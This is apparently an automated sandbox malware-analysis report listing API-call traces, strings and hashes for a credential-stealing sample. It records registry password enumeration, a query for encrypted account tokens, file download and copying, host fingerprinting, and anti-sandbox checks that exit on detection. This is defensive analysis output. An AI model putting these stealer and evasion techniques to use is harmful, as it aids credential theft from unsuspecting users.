                                          • Instruction Fuzzy Hash: DD416EB1D54258AFDB10DFD4CC45BEEBBB9AF48700F000199E505A7280D7796A84CBA5
                                          APIs
                                            • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                            • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                            • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                            • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                            • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                            • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                          • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                          • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                          • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                          • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                          • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                          • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                          • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                          • task.LIBCPMTD ref: 004076FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                          • String ID: :
                                          • API String ID: 3191641157-3653984579
                                          • Opcode ID: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                          • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                          • Opcode Fuzzy Hash: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                          • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                          APIs
                                          • lstrcpy.KERNEL32(?,?), ref: 022D1642
                                            • Part of subcall function 022D9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022D9072
                                            • Part of subcall function 022D94C7: StrStrA.SHLWAPI(?,?), ref: 022D94D3
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022D167E
                                            • Part of subcall function 022D94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022D94F7
                                            • Part of subcall function 022D94C7: lstrlen.KERNEL32(?), ref: 022D950E
                                            • Part of subcall function 022D94C7: wsprintfA.USER32 ref: 022D952E
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022D16C6
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022D170E
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022D1755
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022D179D
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022D17E5
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022D182C
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022D1874
                                            • Part of subcall function 022DAA87: lstrlen.KERNEL32(022C516C,?,?,022C516C,00420DDE), ref: 022DAA92
                                            • Part of subcall function 022DAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022DAAEC
                                          • strtok_s.MSVCRT ref: 022D19B7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                          • String ID:
                                          • API String ID: 4276352425-0
                                          • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                          • Instruction ID: 54b6f1d44981ec61bab09f4e2a89a8888bf75fd6afb3ada90c48840242988e22
                                          • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                          • Instruction Fuzzy Hash: CE7155B6960218ABCB14EBE0DC88EEE737AAF55301F044598F10DA3144EF75AB84CF61
                                          APIs
                                          • memset.MSVCRT ref: 00407314
                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                          • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                            • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                          • task.LIBCPMTD ref: 00407555
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                          • String ID: Password
                                          • API String ID: 2698061284-3434357891
                                          • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                          • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                          • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                          • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                          APIs
                                          • lstrcatA.KERNEL32(?,00799988,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                          • lstrcatA.KERNEL32(?,?), ref: 00414820
                                          • lstrcatA.KERNEL32(?,?), ref: 00414834
                                          • lstrcatA.KERNEL32(?,00794BF0), ref: 00414847
                                          • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                          • lstrcatA.KERNEL32(?,00799E80), ref: 0041486F
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                            • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                            • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                            • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                            • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                          • String ID: 0aA
                                          • API String ID: 167551676-2786531170
                                          • Opcode ID: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                          • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                          • Opcode Fuzzy Hash: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                          • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00799628,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00799628,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                          • __aulldiv.LIBCMT ref: 00418172
                                          • __aulldiv.LIBCMT ref: 00418180
                                          • wsprintfA.USER32 ref: 004181AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                          • String ID: %d MB$@
                                          • API String ID: 2886426298-3474575989
                                          • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                          • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                          • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                          • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                          • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                          • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                          • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service$.y
                                          • API String ID: 1440504306-3341933168
                                          • Opcode ID: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                          • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                          • Opcode Fuzzy Hash: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                          • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                          APIs
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A51
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A68
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A7F
                                            • Part of subcall function 022C4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022C4AA0
                                            • Part of subcall function 022C4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022C4AB0
                                          • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022C6376
                                          • StrCmpCA.SHLWAPI(?,0064A480), ref: 022C63AE
                                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022C63F6
                                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022C641A
                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 022C6443
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022C6471
                                          • CloseHandle.KERNEL32(?,?,00000400), ref: 022C64B0
                                          • InternetCloseHandle.WININET(?), ref: 022C64BA
                                          • InternetCloseHandle.WININET(00000000), ref: 022C64C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                          • String ID:
                                          • API String ID: 4287319946-0
                                          • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                          • Instruction ID: 67dfc47b9beed2af0c21a352ac44cc967c34207309999739b4cbb5bbe06321b1
                                          • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                          • Instruction Fuzzy Hash: BC516DB5A60218ABDB30DFE0CC44BEE7779AB44705F10829CB605A71C4DBB46A85CF95
                                          APIs
                                          • memset.MSVCRT ref: 022D4FEE
                                            • Part of subcall function 022D9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022D9072
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D5017
                                          • lstrcat.KERNEL32(?,00421000), ref: 022D5034
                                            • Part of subcall function 022D4B77: wsprintfA.USER32 ref: 022D4B93
                                            • Part of subcall function 022D4B77: FindFirstFileA.KERNEL32(?,?), ref: 022D4BAA
                                          • memset.MSVCRT ref: 022D507A
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D50A3
                                          • lstrcat.KERNEL32(?,00421020), ref: 022D50C0
                                            • Part of subcall function 022D4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022D4BD8
                                            • Part of subcall function 022D4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022D4BEE
                                            • Part of subcall function 022D4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022D4DE4
                                            • Part of subcall function 022D4B77: FindClose.KERNEL32(000000FF), ref: 022D4DF9
                                          • memset.MSVCRT ref: 022D5106
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D512F
                                          • lstrcat.KERNEL32(?,00421038), ref: 022D514C
                                            • Part of subcall function 022D4B77: wsprintfA.USER32 ref: 022D4C17
                                            • Part of subcall function 022D4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022D4C2C
                                            • Part of subcall function 022D4B77: wsprintfA.USER32 ref: 022D4C49
                                            • Part of subcall function 022D4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022D4C85
                                            • Part of subcall function 022D4B77: lstrcat.KERNEL32(?,0064A524), ref: 022D4CB1
                                            • Part of subcall function 022D4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022D4CC3
                                            • Part of subcall function 022D4B77: lstrcat.KERNEL32(?,?), ref: 022D4CD7
                                            • Part of subcall function 022D4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022D4CE9
                                            • Part of subcall function 022D4B77: lstrcat.KERNEL32(?,?), ref: 022D4CFD
                                            • Part of subcall function 022D4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022D4D13
                                            • Part of subcall function 022D4B77: DeleteFileA.KERNEL32(?), ref: 022D4D98
                                          • memset.MSVCRT ref: 022D5192
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                          • String ID:
                                          • API String ID: 4017274736-0
                                          • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                          • Instruction ID: c32fbc880afc870f932ec7f27b0810a65dec1f4649b06e22f31fd9bb2a6df13a
                                          • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                          • Instruction Fuzzy Hash: 2B41D579A5031467CB10F7F0EC46FD93739AB24701F804594B689660C4EEB957D88F92
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022D8DC7: GetSystemTime.KERNEL32(00420E1A,xJy,004205AE,?,?,022C1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022D8DED
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022CDA68
                                          • lstrlen.KERNEL32(00000000), ref: 022CDC06
                                          • lstrlen.KERNEL32(00000000), ref: 022CDC1A
                                          • DeleteFileA.KERNEL32(00000000), ref: 022CDC99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID: P/y$hKy$.y
                                          • API String ID: 211194620-3654186572
                                          • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                          • Instruction ID: 18dc0bb51eb4d82087b3f4b200956b949eb86c012a68f3d762c3b4dba5283d76
                                          • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                          • Instruction Fuzzy Hash: 5A810E72920318ABCB08FBE4DD95DEE733AAF64304F54466DE006A6194EF346B48CF61
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00794A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                          • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                          • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID: P/y$hKy$.y
                                          • API String ID: 211194620-3654186572
                                          • Opcode ID: 6f72e535e7ae17eb60bcd9d89638ab31fc633a2b1ef8f0b3f434f04c74d69d2e
                                          • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                          • Opcode Fuzzy Hash: 6f72e535e7ae17eb60bcd9d89638ab31fc633a2b1ef8f0b3f434f04c74d69d2e
                                          • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                          APIs
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,X~v), ref: 022D9B08
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022D9B21
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022D9B39
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022D9B51
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022D9B6A
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0, Nv), ref: 022D9B82
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,Hv), ref: 022D9B9A
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,(Iv), ref: 022D9BB3
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,~v), ref: 022D9BCB
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,p~v), ref: 022D9BE3
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,H+y), ref: 022D9BFC
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,h,y), ref: 022D9C14
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,(Jv), ref: 022D9C2C
                                            • Part of subcall function 022D9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022D9C45
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022C1437: ExitProcess.KERNEL32 ref: 022C1478
                                            • Part of subcall function 022C13C7: GetSystemInfo.KERNEL32(?), ref: 022C13D1
                                            • Part of subcall function 022C13C7: ExitProcess.KERNEL32 ref: 022C13E5
                                            • Part of subcall function 022C1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022C1392
                                            • Part of subcall function 022C1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022C1399
                                            • Part of subcall function 022C1377: ExitProcess.KERNEL32 ref: 022C13AA
                                            • Part of subcall function 022C1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022C14A5
                                            • Part of subcall function 022C1487: __aulldiv.LIBCMT ref: 022C14BF
                                            • Part of subcall function 022C1487: __aulldiv.LIBCMT ref: 022C14CD
                                            • Part of subcall function 022C1487: ExitProcess.KERNEL32 ref: 022C14FB
                                            • Part of subcall function 022D69D7: GetUserDefaultLangID.KERNEL32 ref: 022D69DB
                                            • Part of subcall function 022C13F7: ExitProcess.KERNEL32 ref: 022C142D
                                            • Part of subcall function 022D7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022C141E), ref: 022D7AE7
                                            • Part of subcall function 022D7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022D7AEE
                                            • Part of subcall function 022D7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022D7B06
                                            • Part of subcall function 022D7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D7B77
                                            • Part of subcall function 022D7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022D7B7E
                                            • Part of subcall function 022D7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022D7B96
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,p/y,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022D6D31
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022D6D4F
                                          • CloseHandle.KERNEL32(00000000), ref: 022D6D60
                                          • Sleep.KERNEL32(00001770), ref: 022D6D6B
